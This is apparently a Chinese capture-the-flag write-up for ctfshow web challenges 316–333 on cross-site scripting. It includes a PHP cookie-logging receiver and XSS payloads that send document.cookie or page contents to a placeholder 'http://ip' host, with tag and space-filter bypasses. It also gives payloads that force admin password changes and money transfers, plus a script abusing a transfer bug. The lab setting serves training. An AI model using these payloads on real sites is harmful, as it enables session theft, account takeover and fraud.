web316
反射性 XSS
题目提示我们要以 admin
获取
奇葩的是用网上的 xss
平台,获取的 cookie
全是自己的。
可以在自己的服务器上,创建一个接收 cookie 的 PHP 文件:
<?php
$cookie = $_GET['cookie'];
$time = date('Y-m-d h:i:s', time());
$log = fopen("cookie.txt", "a");
fwrite($log,$time.': '. $cookie . "\n");
fclose($log);
?>
构造 xss 语句:
<script>location.href="http://ip/x.php?cookie="+document.cookie</script>
web317
过滤了 script
,标签可以用 img
标签。
<img src="" onerror=location.href="http://ip/x.php?cookie="+document.cookie>
web318-319
img 标签也被过滤了,可以用 body
标签。
<body onload=location.href="http://ip/x.php?cookie="+document.cookie>
web320-326(反射型)
上面的 payload
用不了,测试一番发现过滤了空格,可以用 /
绕过。
<body/onload=location.href="http://ip/x.php?cookie="+document.cookie>
web327(存储型xss)
收件人 admin
,
<body/onload=location.href="http://ip/x.php?cookie="+document.cookie>
web328
在用户管理处显示要 admin
权限,且显示会显示所有的用户名密码,说明它会存储在某个地方,那么这个存的用户名和密码处会不会产生 xss
呢?
答案是会产生 xss
:
上面的那个 body
标签没用了,我们可以使用 <script>
标签。
<script>location.href='http://ip/x.php?cookie='+document.cookie</script>
更改phpsessid 访问用户管理的时候,会跳转,我们可以抓包查看。
web329
继续用上面的payload
获得了 admin
的 cookie,但是访问的时候却还显示不是 admin
,并且 cookie
会变化,也就是说这个 cookie 在使用后就没用了。
看了 bilibili
里的视频后,学到一种姿势,因为它会把我们的 xss
代码即使是在用户管理里也会执行,所以我们可以这届把 flag
发送到我们的服务器里。
<script>
$('.laytable-cell-1-0-1').each(function(index,value){
if(value.innerText.indexOf('ctfshow{')>-1)
{location.href='http://ip/x.php?cookie='+value.innerText}
});
</script>
payload:
<script>$('.laytable-cell-1-0-1').each(function(index,value){if(value.innerText.indexOf('ctfshow{')>-1){location.href='http://ip/x.php?cookie='+value.innerText}});</script>
web330
有修改密码的地方,那我们不就可以直接修改 admin
的密码了吗。
路径也知道了。
payload:
<script>location.href="http://127.0.0.1/api/change.php?p=12345678"</script>
最后登录抓包得到 flag
web331
和上一题不同的是,这次的是 post
请求,用 ajax
异步请求。
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'111'}});</script>
最后注册,登录 admin
拿到 flag
。
web332
经测试自己转账给自己,余额不降反升,那么写个脚本跑一下呗。
import requests
url = 'http://ef46a706-80af-4a5c-8168-42d0aa88b161.challenge.ctf.show/api/amount.php'
money = 4
for i in range(100):
data = {
'u':'111',
'a':money
}
money += 4
cookie = {
'PHPSESSID':'p8fk0f6lht46n8h5n96u5m7fjs'
}
req = requests.post(url,data=data,cookies=cookie)
print(req.text)
web333
同上
预期解释通过 ajax 异步提交 post 数据,让 admin 转账给我们。
具体步骤是,先注册一个收款人用户,再注册一个 xss
用户,之后等会,admin
就转完了。
<script>$.ajax({url:'api/amount.php',type:'post',data:{u:'111',a:'10000'}});</script>